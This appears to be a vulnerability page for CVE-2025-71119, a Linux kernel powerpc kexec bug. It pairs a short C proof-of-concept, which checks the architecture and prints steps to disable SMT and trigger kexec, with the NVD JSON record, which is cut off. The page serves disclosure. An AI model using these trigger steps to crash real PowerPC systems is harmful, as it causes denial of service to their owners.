CVE-2025-71119

// CVE-2025-71119 PoC - Local DoS via kexec on powerpc with SMT disabled // This PoC demonstrates the condition that triggers the vulnerability // Requirements: powerpc architecture, SMT disabled or partially enabled #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/reboot.h> int main() { printf("[*] CVE-2025-71119 Trigger PoC\n"); printf("[*] Target: Linux kernel powerpc kexec with SMT disabled\n\n"); // Check if running on powerpc FILE *cpuinfo = fopen("/proc/cpuinfo", "r"); if (!cpuinfo) { printf("[-] Cannot open /proc/cpuinfo\n"); return 1; } char line[256]; int is_powerpc = 0; while (fgets(line, sizeof(line), cpuinfo)) { if (strstr(line, "powerpc") || strstr(line, "ppc")) { is_powerpc = 1; break; } } fclose(cpuinfo); if (!is_powerpc) { printf("[-] Not running on PowerPC architecture\n"); printf("[-] This vulnerability only affects PowerPC systems\n"); return 1; } printf("[+] Running on PowerPC architecture\n"); // Check SMT status FILE *smt_file = fopen("/sys/devices/system/cpu/smt/active", "r"); if (smt_file) { char smt_status[8]; if (fgets(smt_status, sizeof(smt_status), smt_file)) { printf("[*] SMT status: %s", smt_status); } fclose(smt_file); } printf("\n[*] To trigger this vulnerability:\n"); printf(" 1. Disable SMT: echo off > /sys/devices/system/cpu/smt/control\n"); printf(" 2. Load new kernel: kexec -l /boot/vmlinuz-new --initrd=/boot/initrd.img-new\n"); printf(" 3. Trigger kexec: reboot or kexec -e\n"); printf(" 4. Observe warning in dmesg: 'kexec: Waking offline cpu XXX'\n\n"); printf("[*] Expected result: Kernel warning at arch/powerpc/kexec/core_64.c\n"); printf("[*] Impact: Local DoS - system instability or crash during kexec reboot\n"); return 0; }

{"cve": {"id": "CVE-2025-71119", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.583", "lastModified": "2026-03-25T18:46:03.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\npowerpc/kexec: Habilitar SMT antes de activar las CPU sin conexión\n\nSi SMT está deshabilitado o un estado SMT parcial está habilitado, cuando una nueva imagen de kernel se carga para kexec, al reiniciar se observa la siguiente advertencia:\n\nkexec: Activando cpu 228 sin conexión.\nADVERTENCIA: CPU: 0 PID: 9062 en arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Traza de llamada:\n kexec_prepare_cpus+0x1a0/0x1bc (no fiable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nEsto ocurre porque add_cpu() falla debido a que cpu_bootable() devuelve falso para las CPU que fallan la verificación cpu_smt_thread_allowed() o hilos no primarios si SMT está deshabilitado.\n\nSoluciona el problema habilitando SMT y restableciendo el número de hilos SMT al número de hilos por núcleo, antes de intentar activar todas las CPU presentes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.72", "versionEndExcluding": "6.1.160", "matchCriteriaId": "A16C0F70-6082-4AEE-BDEF-76E8CA8FB720"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.12", "versionEndExcluding": "6.6", "matchCriteriaId": "AFD63F94-BD00-4EF2-9873-45E8DED18B9A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "C5F84D90-D922-47D3-B042-99569840DD8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, ... (truncated)